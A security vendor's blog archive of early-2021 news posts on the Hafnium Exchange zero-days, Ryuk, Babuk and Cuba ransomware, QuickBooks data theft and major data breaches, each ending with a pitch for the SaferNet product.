Jerry, Author at Safernet

CCP-Backed Hackers Target Exchange Servers With Zero-Day Exploit

Post On: 12 March, 2021 By : Jerry

Hackers backed by the Chinese Communist Party have taken advantage of zero-day exploits in Microsoft Exchange to gain access and spy on computers, Microsoft researchers say. On Tuesday, the company reported on four zero-day vulnerabilities within their exchange servers that were exploited. Once inside, the hackers gained access to email accounts and installed additional malware to enable long-term access to the victims’ computers. Microsoft is urging users to download new updates to patch the vulnerabilities.

In their report, the researchers have identified the hackers as Hafnium, a group which conduct affairs from China and who are believed to be sponsored by the Chinese government.

It is clear from the attack that the hackers are highly skilled and competent, as to take advantage of the exploits required a great degree of knowledge and research, and much sophistication to actually carry out.

Is it currently not believe that the intended targets are individual Exchange users, rather business accounts.

Zero-Day vulnerabilities, though are seemingly becoming more common, are a fairly common occurrence with all forms of software, though usually affecting large updates to Operating Systems.

When a new product or update is released, it can be released with some weakness or vulnerability within the code itself, which can be exploited by hackers.

Finding these vulnerabilities is tricky. It often requires reverse-engineering beta releases, and having a keen understanding of both the programming language and penetration testing.

In the White-Hat hacking community, hackers often complete Bug Bounties for companies such as Microsoft and Google. In these, the hacker finds a zero-day vulnerability and alerts only the company affected. The company rewards the hacker in the form of a bounty, which can be as much as $100,000.

In the Black-Hat hacking community, identifying the vulnerability is the same, but the outcome is different. Freelance hackers may sell knowledge of the exploit on the Dark Web for hundreds of thousands of dollars, though they often belong to a larger hacking organization that will use the exploit for themselves.

Anatomy of the Exploits

Often when exploits are discovered in a release, it may take some time for Microsoft to push for its users to update. However, given the severity of the four discovered, they have advised immediate updates. The four exploits in question are CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065.

CVE-2021-26855 is a server-side request forgery (SSRF) vulnerability in Exchange which allowed the attacker to send arbitrary HTTP requests and authenticate as the Exchange server.

CVE-2021-26857 is an insecure deserialization vulnerability in the Unified Messaging service. Insecure deserialization is where untrusted user-controllable data is deserialized by a program. Exploiting this vulnerability gave Hafnium the ability to run code as SYSTEM on the Exchange server. This requires administrator permission or another vulnerability to exploit.

CVE-2021-26858 is a post-authentication arbitrary file write vulnerability in Exchange. If Hafnium could authenticate with the Exchange server then they could use this vulnerability to write a file to any path on the server. They could authenticate by exploiting the CVE-2021-26855 SSRF vulnerability or by compromising a legitimate admin’s credentials.

CVE-2021-27065 is a post-authentication arbitrary file write vulnerability in Exchange. If Hafnium could authenticate with the Exchange server then they could use this vulnerability to write a file to any path on the server. They could authenticate by exploiting the CVE-2021-26855 SSRF vulnerability or by compromising a legitimate admin’s credentials.

Hafnium: The Hackers Behind The Attacks

The hackers behind the attack, Hafnium, are believed to be backed by the Chinese Government. Unlike groups like Lazarus, Hafnium have been keeping a very low profile and seems to put more effort into hiding their tracks than other organizations have.

Microsoft claims, “Hafnium primarily targets entities in the United States across a number of industry sectors, including infectious disease researchers, law firms, higher education institutions, defense contractors, policy think tanks, and NGOs.”

Hafnium has a history of exploiting zero-day vulnerabilities of systems that use internet-facing servers. Usually, when they penetrate a network, they exfiltrate data to file share sharing sites like MEGA.

Microsoft has been tracking Hafnium for a number of months after previous attempts by the group on the exchange servers. There have been several cases in the past of Hafnium trying to interfere with Office 365 users.

Protection Against Hackers

There are many steps to take to ensure your business and family are safe against hackers. Updating systems with the latest patches as Microsoft suggest is one step, another being using the right tools to stay protected.

One of these tools is SaferNet.

SaferNet is the perfect solution to the cybersecurity issues that individuals, families, and businesses face today. It not only connects every device using a secure, 24/7 always on, military grade VPN, but it also stops outside cyberthreats, malware and viruses as well. On SaferNet, all users are protected anywhere in the world, all the time, on any cellular or Wi-Fi network. In addition to SaferNet’s VPN and cyber protection, it also offers a range of employee or parental/family internet controls including internet filtering, monitoring, scheduling, and blocking access to websites or even entire website categories

Typically, a business or family would need 3 separate services for a VPN, Malware Protection, and Internet Controls; SaferNet offers all 3 features in one service. SaferNet truly is an endpoint security presence that can be implemented in minutes around the world, on phones, laptops, tablets, and computers at an economical price point that caters to all sizes of businesses and families. SaferNet guarantees a smooth setup and installation process that takes only minutes, and an easily accessible control hub for you to monitor all your employee’s or family members devices; including activity, time spent online, and threats blocked.

Try SaferNet Now!

Universal Health Services Report $67 Million Loss To Ryuk Ransomware

Post On: 12 March, 2021 By : Jerry

Ransomware damages can be a huge chunk of a companies yearly expenditure, and the number is often alarming. This is the case with Universal Health Services (UHS), who revealed they had been victims of a large Ransomware attack in September 2020. The attack had come from the infamous ransomware strain Ryuk and cost the company $67 Million.

UHS is a major healthcare provider, a Fortune 500 hospital that provides private services to 3.5 Million patients patience in over 400 healthcare facilities across the US and the UK.

Delays in services since September prompted many to speculate if a cyberattack had taken place. UHS had declined to comment on the matter previously but revealed the company’s earnings report’s breach on February 25th.

When their systems were infected, UHS was quick to disconnect internal servers from the network to halt the spread of ransomware. Gradually, they began to move patient data via backups to new servers. This lead to a notable slowdown in their services.

“The substantial majority of the unfavorable impact was attributable to our acute care services and consisted primarily of lost operating income resulting from the related decrease in patient activity as well as increased revenue reserves recorded in connection with the associated billing delays,” UHS stated.

“Also included were certain labor expenses, professional fees and other operating expenses incurred as a direct result of this incident and the related disruption to our operations.”

“We also incurred significant incremental labor expense, both internal and external, to restore information technology operations as expeditiously as possible.”

UHS went on to state that patient data was delivered safely from the infected systems.

Ryuks’ Ransomware Campaign

We have mentioned Ryuk in a previous article, and it continues its attack campaign against mostly hospitals and other healthcare providers.

Ryuk is a highly sophisticated form of Malware. There are several suspected organizations behind it, ranging from Lazarus Group to other groups in Russia.

Besides its technical complexity, Ryuk is also notable for having a much higher charge of ransom than its predecessors. In its lifetime so far, it has impacted many businesses and organizations globally, often enriching the finances of the hackers behind it.

Ryuk usually is deployed via trojans like Emotet. Unlike its peers, Ryuk does not strike immediately; it takes several days and sometimes weeks to become apparent to the user. In this seemingly dormant time, Ryuk makes several changes to the user’s Operating System to ensure its success.

One of these operations is to disable all Windows System Restore and Windows Registry functionalities, guaranteeing that IT teams can’t restore machines to a previous, safer state. Ryuk also uses the hosts’ network and was able to infect other devices found on the network. In a hospital or corporation, this meant entire buildings could be infected in a short space of time.

The team at UHS was likely aware of Ryuks’ capabilities and had recent backups created. While they have not detailed much of their teams’ response for security reasons, it looks like they acted quickly to transfer data before Ryuk could take full control.

Hospitals As Targets For Ransomware

Ryuk stepped up its campaign against hospitals last year, hitting roughly 20 companies affiliated with healthcare every week during the third quarter of 2020. It is not the only Ransomware strain involved with targeting hospitals.

Hospitals make the ideal target for Ransomware; they command massive amounts of sensitive patient personal information, which if seized by hackers can sell easily on the Dark Web. They usually operate on interconnected networks while allows Ransomware to propagate quickly. Add these issues with the financial backing healthcare has, and the whole industry has a digital bullseye on its back.

The Pandemic added fuel to this fire; with more hospitals switching to online services, additional attack vectors opened up for hackers.

An increase of 71% of attacks against hospitals last year prompted the FBI to issue a warning report.

Protection Against Ransomware

Healthcare isn’t the only target for Ransomware – The majority of ransomware cases take place against smaller businesses and family homes.

As attacks ramp up, it’s important to use the tools out there to protect your business and your family online. One of these tools is SaferNet.

Try SaferNet Now!

New Ransomware for 2021 Babuk Hits Several Industries

Post On: 12 March, 2021 By : Jerry

Ransomware has proved to be one of the key malware threats for 2021, only three months into the year. Veterans to the scene like Ryuk still propagate massively, while novices like 2019’s Cuba are making headlines. Among the well-known faces in the world of ransomware is a newcomer – Babuk. Babuk was discovered in January of this year and has hit five major industries – Transportation, Healthcare, Plastics, Electronics, and the Agricultural sector.

Of the attacks it has carried out, just one target has paid the ransom, $85,000. The target in question was Serco.

For those who have not paid, the data is already for sale on the Dark Web.

Babuk uses several attack vectors seen in other Ransomware. Primarily, it utilizes Spear Phishing. The organization behind Babuk gets the emails of managers and executives of a company and starts emailing them, pretending to be a supplier, distributor, or another trusted party. The emails will contain an attachment. Within the attachment will be a popular trojan loader; In two cases, Emotet and Trickbot were reported. Once the attachment is opened, and the trojan is executed, Babuk will deploy on the target machine.

Babuk has also penetrated systems by using exploits. There are fewer people more up-to-date on security news than hackers, who are routinely looking for news on exploits on servers and databases, particularly those relating to Windows systems. Exploits like these mean there’s no requirement to ‘hack’ into the system as such, but rather to walk through a door that’s been left open. One report of a Babuk infection has traced back to an exploit within Remote Desktop access.

Lastly, Babuk has found entry methods via credential purchases on the Dark Web. Corporate accounts, information, and email addresses are all for sale on the Dark Web. Researchers at McAfee claim that several breaches by Babuk have been a result of using stolen credentials like these.

Unsophisticated Ransomware

Despite the damage Babuk is causing, researchers at McAfee have noted that the ransomware is fairly unsophisticated compared to more complex malware like Ryuk.

Babuk uses a ChaCha8 stream cipher for encryption and Elliptic-curve Diffie-Hellman for key generation. This makes recovery of the files without paying the ransom difficult for certain, but this encryption level is fairly standard.

Though seemingly independent, Babuk does share some core functionality seen in other Ransomware-as-a-Service (RaaS) products. Research points to the likelihood that the gang behind Babuk bought RaaS and have since reverse-engineered it and began to make it their own.

Babuk also contains a number of noticeable bugs, as well as lacking the obfuscation required for large-scale Ransomware campaigns. The researchers have stated the group behind the attacks has, “limited ransomware coding experience.”

Finally, Babuk contains no local-language checks. Often, Ransomware will check the language of the device before deploying. As a general rule of thumb, it will not deploy if the devices’ language is Russian or other Eastern European languages.

Recruitment in the RaaS World

Ransom Letter Left by Babuk

As mentioned, the Babuk group seem to be reverse engineering RaaS in order to make it their own.

Attempts at this so far have certainly led to monetary gain, but as the researchers pointed out, the Ransomware itself is not very complex.

The group is seemingly aware of their limitations and has begun recruitment drives on the Dark Web.

Specifically, the Baruk group have begun hiring individuals skilled in ‘winPEAS, Bloodhound, SharpHound, CobaltStrike, and Metasploit’. This list of tools points to them hiring penetration testers, who will likely be tasked with enhancing Baruks’ capabilities to breach a system.

Due to this, McAfee has noted cybersecurity administrators should be on the lookout for suspicious behavior in non-malicious tools, such as PowerShell.

Protection Against Ransomware

As the criminals are gearing up in their recruitment, SMBs and individuals should be gearing up their arsenal of tools to protect against Ransomware like Babuk.

One of these tools is SaferNet.

Try SaferNet Now!

Quickbooks users under attack as tax season heralds data-theft surge

Post On: 12 March, 2021 By : Jerry

Quickbooks, the popular accounting software package, is under attack by a number of different hacking organizations utilizing various attack vectors, one which takes advantage of a cybersecurity design flaw within Quickbooks itself. Tax season is usually a busy one for cybercriminals. With Quickbooks’ proliferation as the go-to accounting platform for SMBs, their choice of target was an obvious one.

The attack campaign, in general, is centered around spear phishing. The targets are not selected randomly; instead, the hackers have carried out research in selecting specific companies. The bulk of this has been done on websites like LinkedIn. Individuals in a company may have their email addresses displayed; these addresses are usually added to a larger attack database for the hackers to use.

Researchers at ThreatLocker encountered the issue this week and identified 3 main attack vectors.

For the first vector, the hackers will send a PowerShell command that runs inside an email. The second is something a little more familiar; an email containing a Microsoft document. Once the document is opened, a macro within will execute. Both vectors run a similar Malware executable that is just 15 lines of code.

When either vector is used successfully, the malware will find out most recently saved Quickbooks files and points them to file share or the local directory. From here, they are uploaded to the hackers servers.

The third attack vector differs from the others as it doesn’t require the user to download Malware; instead, the hackers have taken advantage of a design flaw in Quickbooks cybersecurity. The hacker can run an Invoke-WebRequest, which utilizes weak access permission in the Quickbooks database to capture details. An Invoke-WebRequest is simply a PowerShell command that scrapes details from a webpage or server.

ThreatLocker successfully tracked much of the stolen data back to the Dark Web, where it is being sold as a commodity. Researchers found data on sale for as cheap as $100 for 100 corporate databases. The price has risen into the thousands for a clean database with full financial information.

As for what is being done with the sold data, it could take several forms. The attack is still on-going, so we will likely not know its full extent until later this year.

One such result of the sold data that has been revealed is a classic bait-and-switch social engineering scam. Once a hacker has garnished enough information about a company and their invoices from their Quickbooks database, they use it for other spear-phishing campaigns. Some that have already been reported involved emailing a customer disguised as a supplier and requesting a payment transfer to a new bank account. Another example involves sending an email from an address that appears to be a known supplier, partner, or customer and requesting a bank transfer.

Quickbooks Security Design Flaws

Quickbooks is not a newcomer to the accounting software scene and has been available for decades. Recent releases, notably Quickbooks 2019 and Quickbooks 2020, emphasize user-requested features, which gave the platform a greater lead over its competitors.

Early versions of Quickbooks, specifically the 1992 launch, were thought to have poor security standards. While they have worked on their security since then, these recent reports suggest there are still some less-than-secure practices still in place.

This is apparent in the success of using an Invoke-WebRequest on Quickbooks file servers.

When Quickbooks is on a file server, the user is required to use Quickbooks Database Server Manager. If a repair is carried out, all file permissions are hard-rest, and the ‘Everyone’ group is added to permissions. This is frankly disastrous, as the database is left wide-open, and anybody can access it.

This approach requires little technical insight from the hacker; Invoke-WebRequest is one of the basic PowerShell commands.

In their report, ThreatLocker recommends that you routinely check your file permissions, ensuring it is not set to ‘Everyone.’ This is particularly important after carrying out any repairs. Permissions should be set to a single user if possible within the organizations’ structure.

Phishing Attacks on SMBs

The recent attacks on Quickbooks and the vulnerabilities within its design is just another addition to the long list of cybersecurity threats SMBs are facing today.

Email risk is without a doubt the biggest concern when tightening security within an SMB. These concerns have always been present but heightened sharply with the COVID-19 Pandemic. The pandemic restructured the classic office layout as employees began working from home.

This led to an increased dependence on email for communication and using other cloud platforms to work, some of which was rushed in development to be available for companies during this time; this, in turn, leads to security vulnerabilities within.

The Pandemic became open-season for cybercriminals, who have found new and better ways to exploit the chain of communication put in place to ensure employees can work as normal.

Smaller businesses, in particular, are at risk, as they lack the resources to keep up with emerging threats.

Last year, 91% of all successful cyberattacks against SMBs began with a phishing email, while 55% of SMBs said they had been victim to a phishing attack.

According to the National Small Business Association, small businesses annually absorb over $20K in costs per attack, with SMBs spending nearly $900K to clean-up after an actual data breach.

Protection Against Phishing And Other Attacks

If one thing is clear, its that Small Businesses are Big Targets.

Phishing as an attack threat is ultimately one that can be greatly lessened by education. Making employees aware of email threats, and how to spot them, can go a very long way in protecting a business no matter its size.

Few people can spot every fraudulent email, though, and it’s wise to have the necessary tools to back up employee security where intuition falls short.

One of these tools is SaferNet, which was designed with SMBs in-mind.

SaferNet is the perfect solution to the cybersecurity issues that individuals, families, and businesses face today. It not only connects every device using a secure, 24/7 always on, military grade VPN, but it also stops outside cyberthreats, malware and viruses as well. On SaferNet, all users are protected anywhere in the world, all the time, on any cellular or Wi-Fi network. In addition to SaferNet’s VPN and cyber protection, it also offers a range of employee or parental/family internet controls including internet filtering, monitoring, scheduling, and blocking access to websites or even entire website categories

Try SaferNet Now!

Hospitals Return To Paper Systems as Ransomware Takes Hold on Health Service

Post On: 12 March, 2021 By : Jerry

Ransomware has gripped the health service in France, as two hospitals have opted to return to paper systems to continue their work without technology while the infection holds. The hospitals at Dax and Villefranche-sur-Saône were forced to shut off the internet and other networks to stop the ransomware infection from spreading. The hackers also shut off the hospitals’ telephone systems.

The attacks are a part of a wider ransomware campaign on Frances’ health service. Though still early in the year, several French hospitals have been hit with ransomware, prompting a general warning from the Health Minister. President Macron has pledged €1bn to combat cybersecurity issues in the country a few days ago.

The National Information Systems Security Agency (Anssi) has been working to repair the systems at Dax and Villefranche-sur-Saône, though full restorations are expected to take weeks.

Ransomware has targeted the health industry for many years. However, most people only became aware of this during the WannaCry attacks of 2017, which crippled the National Health Service in the United Kingdom.

The chief goal of Ransomware is always to enable the hackers to make money from the attack. Preferably for the hackers, this means that the target will pay the ransom upfront and will have their files decrypted.

If the target does not pay the ransomware, the encrypted files are most commonly returned to the hackers via a backdoor the virus has established. Once on the hackers’ end, the files will be decrypted and sold on the Dark Web.

Medical records are somewhat the bread-and-butter and stolen data that can be sold on the dark web. Often these contain Personally identifiable information (PII). PII has enough content to identify an individual, which is enough to commit identity theft in many cases. This gives medical records measurable value on the dark web, as using these records for nefarious ends can be lucrative.

CybelAngel, a leader in digital threat research, has been studying the ransomware attacks on French hospitals and has identified the medical records being sold on the dark web. Neither of the hospitals at Dax and Villefranche-sur-Saône paid the ransom, so the data is on sale. CybelAngel has reported as many as 500,000 of these records are currently on the Dark Web from the attacks.

Ransomware Attack Vector

Although the hackers’ identity has not been revealed or is unknown, there are some details known concerning the attack vector and nature of the attacks on Dax and Villefranche-sur-Saône.

It is believed the Ransomware was deployed via a remote access service, using login details possibly harvested via phishing – the attack was well-planned in advance.

As for the ransomware itself, it has been confirmed that Ryuk was used.

Ryuk is one of the more sophisticated forms of ransomware. It is usually deployed via a trojan, though it has been reported as using several other methods.

Ryuk can lay dormant in a machine’s registry for potentially weeks before being activated. It is most commonly seen in large multi-network entities such as hospitals. It uses the network to propagate after infecting a single device, so hospitals are ideal for a group using Ryuk.

Ryuk has been linked with high-profile hacking organizations such as Lazarus Group in the past.

Other Ransomware Attacks in France

The last 12 months have seen a sharp increase in Ransomware attacks in France, which have risen 255% since 2019.

The attacks have been on several industries, including the education system and digital service provides, although the hardest hit group has been the healthcare system.

France is not alone in this; nearly every country globally has reported a staggering amount of Ransomware attacks in the last year.

One must view the larger context for these attacks through the lens of the COVID-19 Pandemic. Changes in how hospitals operate and how they handle patients have meant upscaling systems or switches to new systems entirely.

At times like these, where sensitive medical records are being sent from system to system, Ransomware often finds a place to flourish.

Among other targets hit in this new wave of attacks in France has been Mutuelle Nationale des Hospitaliers (MNH). MNH is a healthcare insurance company that provides services to all public and private medical professionals. MNH was hit with Ransomware in early February, and they were forced to cease all operations during the attack.

MNH was hit by the RansomExx group, who use a variation on the popular ransomware family Defray777. The group has previously targeted the Texas Department of Transportation, Brazilian government networks, IPG Photonics, Tyler Technologies, and Konica Minolta. It is unknown if this group were also behind the attack on the hospitals at Dax and Villefranche-sur-Saône.

What You Can Do About Ransomware

A common mistake is believing that all Ransomware attacks are large-scale industrial assaults that don’t target homes or small to medium businesses. In reality, the majority of Ransomware targets these entities. While not as lucrative for the hackers, using smaller targets means government or federal authorities are less likely to intervene, and thus the victim more likely to pay the ransom.

We are seeing a renaissance across the board for all forms of Malware, fueled by a work-from-home society and an increasingly connected community.

In times like these, it is important to have the right tools to ensure you or your business don’t fall victim. SaferNet was built as one of these tools.

Typically, a business or family would need 3 separate services for a VPN, Malware Protection, and Internet Controls; SaferNet offers all 3 features in one service. SaferNet truly is an endpoint security presence that can be implemented in minutes around the world, on phones, laptops, tablets, and computers at an economical price point that caters to all sizes of businesses and families. SaferNet guarantees a smooth setup and installation process that takes only minutes, and an easily accessible control hub for you to monitor all your employee’s or family members’ devices; including activity, time spent online, and threats blocked.

Try SaferNet Now!

5 Data Breaches That Caused Identity Theft

Post On: 25 February, 2021 By : Jerry

Identity Theft can be absolutely devastating for an individual. Usually, in the world of malware, we know certain things can be harmed. Our devices may need to be replaced, we may lose access to accounts for a few days or even forever, we may even need to pay a ransom for access to our data. The point is, with most types of Malware, we can eventually rebuild, though it may take longer than we anticipate. The fallout from identity theft is much longer.

Once your stolen information is used once, it can take anywhere from a few days to six months for that one incident. But your information is out there for a very, very long time. This means you could end up dealing with identity theft for many years, even decades.

Identity Theft has been around for a very long time and predates our modern technology by thousands of years. There have always been individuals that try to impersonate others for their own gain, financial or otherwise. However, the internet’s birth and wide adoption have led to new attack vectors, dwarfing any possible past attempts.

Now more than ever do we have data tied into our personal identity. Email addresses, banking numbers, phone numbers, social security numbers, home addresses – All of these and more form a picture of us as lines in a database.

And when this information falls into the wrong hands, it can do a lot of damage. Bank accounts can be drained, and your credit rating can get rattled; you can end up with medical bills or even a criminal record. The list of potential mishaps that can arise from identity theft is endless.

To hackers, identity theft represents a lucrative stream of income, and they can very easily cover their tracks. After they have seized personal information, they sell it on the dark web. This information can be sold over time, repeatedly, meaning that if you notice your identity has been stolen and used, it can be used in several instances over a long period of years.

There are some guidelines from the US government in discovering if you are a victim of identity theft if it is not immediately obvious:

You stop receiving your regular bills and credit card statements.
You receive statements for accounts you never opened.
Debt collectors start calling you day and night about debts you’ve never heard of.
The IRS alleges you failed to report income for a company you never worked for.
You see withdrawals/charges on your bank or credit card statement that you didn’t make.
You try to file your taxes only to discover that someone else beat you to it.
You try to file your taxes and find someone claimed your child as a dependent already.
Your credit report includes lines of credit you never opened.
Your credit score fluctuates wildly and for no apparent reason.
The most obvious sign—you receive a notification that you’ve been the victim of a data breach.

If you are unsure, it is always best to check with the authorities on the US government’s identity theft website.

There are two primary attack vectors when it comes identity theft online.

The first concerns a personal cyber attack that compromises your data. This takes place on your own devices, though usually, you are not aware of it. There is often a reliance on the user to fall for phishing scams or have inadequate cybersecurity protection. This will be covered in more detail later.

The other attack vector is through data breaches. These are exceptionally sophisticated large-scale attacks, usually on banks and hospitals. When a hacker breaches one of these institutes, they make off with thousands and often millions of records. These are immediately put up for sale on the Dark Web. Today, let’s look at 5 data breaches that caused identity theft on a large

Data Breaches That Caused Identity Theft #5: Yahoo!

The Yahoo! data breach doesn’t seem like an immediately obvious choice – Yahoo! do not operate as a bank or hospital, so do not store as much in-depth information about their users. However, the sheer scale of the breach meant that enough information was sold to commit identity theft.

To date, the Yahoo! breach is the largest and will likely remain so very a long time. While often referred to as one breach, the incident in-fact covers two breaches in 2013 but was not reported on until 2016. It was only in 2017 was the true scale of the damage was revealed.

In 2016, Wired and Vice’s journalists managed to secure an interview with an individual known online as Peace_of_Mind, or simply Peace. Peace revealed that he was working from a website on the Dark Web known as TheRealDeal. TheRealDeal had long been known to authorities; the site was a large part of the cyber arms industry and sold malware-as-a-service and personal data records for millions of people.

The website had been shut down by the time of the interview, and Peace was mostly retired. He informed the journalists that he acted as a broker; hackers would sell information to him, and he would sell to the masses. In the article, Peace names Yahoo! as one of the main sources of the information he sold.

It was only after the publication of the article that Yahoo! responded, stating they were aware of breaches. At first, they claimed 500 million users had their information stolen. In a second breach, they estimated it was about a billion accounts that had been compromised. Finally, in 2017, Yahoo! affirmed that 3 billion accounts had been compromised.

While Peace never revealed who sold him the information, the hackers were eventually caught. The four men accused include Alexsey Belan, a hacker on the FBI Ten Most Wanted Fugitives list, FSB agents Dmitry Dokuchaev and Igor Sushchin who the FBI accused of paying Belan and other hackers to conduct the hack, and Canadian hacker Karim Baratov who the FBI claimed was paid by Dokuchaev and Sushchin to use data obtained by the Yahoo! breaches to breach into about 80 non-Yahoo! accounts of specific targets.

The breach had a huge fallout, especially in the court cases against Yahoo!, many of which are still on-going. Because they did not tell their users there were breaches, Yahoo! has faced harsh criticisms. In 2018, a court settlement stated that anyone who could document that they were a victim of identity theft following the attack could receive money from Yahoo! from the settlement.

Data Breaches That Caused Identity Theft #4: JP Morgan Chase

In 2014, the JP Morgan Chase cyberattack and data breach was considered to be one of the most serious penetrations of America’s financial infrastructure to date.

4 hackers, 3 Israeli and 1 American began a series of spear-phishing attacks against JP Morgan Chase. Through these attacks, they intended to gain access to user accounts across Chases’ systems. In total, they got the details of 83 Million accounts, which covered 76 million households across the US.

Luckily, much of the data they stole was not fully revealing. It did not include social security numbers or passwords but did include names, addresses, emails, and phone numbers.

JP Morgan Chase and authorities acted immediately against the breach, and thankfully much of the information taken was unable to be sold online in time. The 4 involved in the scheme were quickly arrested and have since been sentenced.

While, thankfully, this data breach didn’t cause identity theft on a massive scale, it set a precedent. Banks could be breached – easily. The information could be taken, and if a hacker covered their tracks well enough, they had time to sell it.

Following the attack, JP Morgan Chase pledged a $150 Million cybersecurity budget per year and has given free credit monitoring to all involved in the breach to combat future instances of identity theft.

Data Breaches That Caused Identity Theft #3: Marriott Hotels

The Marriott Hotels breach was particularly harmful and long-lasting.

In 2016, Marriott purchased the Starwood Hotels and Resorts company. However, unknown to Marriott and Starwood was that since 2014 the Starwood databases had been breached by a Remote-Access-Trojan (RAT) and were actively being monitored.

During a routine security check-up in 2018, Marriott noticed unusual database queries within Starwoods database, from an individual with Administrator-level privileges. An investigation took place and it was discovered the person with those privileges did not make those queries – It was someone else controlling the account.

Database forensics revealed just how long the breach had lasted; at this point 4 years. It also revealed the scale – The information of 500 million guest records had been stolen.

For a hotel, this was a disaster. As well as names, emails, phone numbers, and addresses, credit card information and passport numbers were also stolen. Passport numbers in particular represent low-hanging fruit in the world of identity theft.

It is unknown who carried out the attack, but most signs point to Chinese military. Marriott have been involved in a number of class-action lawsuits, and the settlement has delivered a big pay-day for those affected by identity theft.

Data Breaches That Caused Identity Theft #2: Capital One

In July 2019, Capital One announced that they had undergone a massive data breach thanks to the actions of one hacker.

Months previous, a Seattle software engineer named Paige Thomas, had used the knowledge she gained while working for Amazon AWS Cloud Services to exploit an issue with Capital One’s internal firewalls and breach their systems. Thomas stole the records of 106 million people in the United States and Canada. This included social security numbers, which are the keys to commit identity fraud in the US.

Immediately after the attack, Thomas sold the data across sections of the Dark Web. Much of this data has yet to been used, so those affected may not even be aware somebody else has their information.

Thomas’s downfall was her hubris; After selling the data, she bragged about the attack in several hacking forums online. A common misconception about the hacking community is that they’re mostly criminals. Instead, the opposite is true, and her identity was revealed by several white-hat hackers within the community. She was swiftly arrested.

Capital One has been criticized for their response to the attack, specifically as they denied social security numbers and account numbers had been compromised, which later proved to be untrue. They are currently involved in many lawsuits as well Amazon and Github, who are accused of having knowledge of the exploit but not acting upon fixing it.

Data Breaches That Caused Identity Theft #1: Equifax

The Equifax breach is probably the best-known of all data breaches to have occurred. The personal, financial, and political fallout from the Equifax breach has been staggering.

Equifax is a credit reporting bureau and assesses the financial health of nearly every individual across the US. In March 2017, poor security practices led the data of 150 Million Americans being stolen, along with the personal information of 15 Million British citizens.

Several failures on Equifax’ part made the attack possible. Hackers exploited a vulnerability on the web portal at first; this vulnerability had been known for months yet the company hadn’t patched it out. Following this, the hackers were able to freely move around Equifax servers. This, again, is a cybersecurity flaw – Equifax failed to segment their servers correctly, leading to this kind of movement. Finally, Equifax had failed to renew encryption certificates for months – Which meant the hackers could pull out information undetected.

When Equifax realized the breach, they did not report on it for several weeks. Sales of Equifax stock at the time before the announcement have led to speculation that insider trading took place here.

The data stolen included nearly everything you could know about someone – name, address, email, phone number, social security number, credit card number, even their driver’s license number.

The identity theft fallout from Equifax is not what you’d expect. Following the incident, many in the information security community monitored the Dark Web for bulks of data appearing in stores. This never really happened – There was a trickle of data, but never any large drop. Millions had their data sold, but not the 150 million as expected.

This pointed to a possible culprit – state-sponsored hackers. Sure enough, in a rare move, the Department of Justice charged 4 members of the Chinese military in early 2020. This is considered rare because foreign military intelligence operatives are not often charged with criminal charges.

This has brought about a theory that the Chinese military was not all too interested in selling the data but perhaps were using it for espionage. It is unknown what the Chinese military would do with 150 million social security numbers, but perhaps the story is not fully told yet.

What you can do to Prevent Identity Theft

In the above cases, the individuals who had their information leaked were not at fault, rather it was corporations that were held responsible.

These are cases of large-scale data breaches, but every-day identity theft occurs most often on a personal scale.

Phishing attacks, Spyware, and Botnets are all used against us daily to uncover our details, and most of us do not have adequate protection.

SaferNet was engineered with threats like identity-theft in mind.

Try SaferNet Now

Cuba Ransomware Gang Set to Continue Attacks Against US Local Government for the Duration of 2021

Post On: 25 February, 2021 By : Jerry

Ransomware is a lucrative business. While once a type of malware targeted mostly consumers, in the last decade, Ransomware has turned its sights on the business, financial, and government sectors. Though ever-evolving to new stages of complexity, the idea behind it is fairly simple. A computer, or phone, gets infected with Ransomware, and all the files on the device are locked up in a special type of encryption. The user will see a message on the screen from the hacker, stating that their files have been locked and must pay a sum of money for everything to be unencrypted.

It is most common for just files to be encrypted, but other types of Ransomware have been known to lock down entire operating systems.

The Cuba Ransomware was first sighted in late 2019 after infecting a number of individual machines. These incidents were not widely reported on, as they seemed to be isolated. It’s now thought the individuals behind this, known as the Cuba Ransomware Gang or just ‘Cuba Gang,’ were practicing and dipping their feet in the world of cybercrime.

Throughout 2020, the Cuba Ransomware was reported on several systems, though none major. However, the volume of reports that appear prompted cybersecurity researchers to publish data on the attacks’ exact nature.

Cuba Gang were marked as potential major threat actor, and in Feburary 2021 they lived up to their reputation.

On the 4th, Cuba Gang attacked the Automatic Funds Transfer Services (AFTS). The AFTS are a billing and payment processing which operate out of Seattle. They operate with a number of local, municipal and state government entities in the state of Washington, but also across the United States.

Given the reach of the AFTS, it’s no surprise how many entities have been affected. The AFTS refused to pay the ransom on their data, and so Cuba Gang promptly transferred it back to their own servers to sell on the Dark Web.

For most cities using AFTS that were affected, the breach is not as destructive as it could have been. It is understood no Social Security Numbers were disclosed in the encrypted files; however, names, billing account numbers, addresses, and other categories of personal information have been. Within Washington, the following cities citizens are affected:

Seattle
Kirkland
Monroe
Lynnwood
Lakewood
Everett

The most notable victim in the attack is the California Department of Motor Vehicles, which used AFTS. It is believed the details of up to 38 Million citizens have been exposed, which are now being sold online for the purposes of identity theft.

The data exposed from the breach includes names, addresses, phone numbers, license plate numbers, VINs, credit card information, scanned paper checks, and billing details.

At the time of writing, the attack is still on-going, and more cities are finding themselves affected. The AFTS website is currently unavailable, and the authorities including the FBI are investigating the incident.

The Nature of Cuba Ransomware

Cuba targets only Windows devices, though it functions on all Windows OS versions from Windows XP to Windows 10, meaning it can penetrate legacy-server systems that many industrial institutes still use today to the most modern machines.

The ransom note shown to users with infected devices

Once inside, the virus will encrypt all files with the .cuba extension, e.g., picture.jpg will become picture.jpg.cuba. These files will not be able to be opened by the victim while in this encrypted state.

The victim will be instructed via Notepad that if they want to decrypt their files, they will need to contact a protonmail based address to arrange the ransom – a money transfer to get the files back.

If the ransom is not paid, a backdoor within the virus activates. This backdoor funnels the encrypted files back to Cuba Gangs’ Command Center. Once decrypted on their side, the files are then sold on their website located on the Dark Web.

Cuba Gangs’ homepage on the Dark Web as seen using TOR Browser

AFTS files for sale on Cuba Gangs siteThe identities of the hackers involved in Cuba Gang are unknown. The gang may have no affiliation with the country of Cuba; the name and website design could easily be a red herring.

The full scale of this attack has not yet been revealed, what is clear though is that Cuba Gang have gone from small-time crooks to large-scale criminals. Given the success of their attack on AFTS, it is likely they will continue this campaign against US local governments for duration of 2021.

The Genesis of the Attack

In the modern-era of Software-as-a-Service and Gaming-as-a-Service, you would be correct to assume that Malware has taken up this trend too. Malware-as-a-service (MaaS) has led to a tidal wave of cyberattacks on the web in recent years.

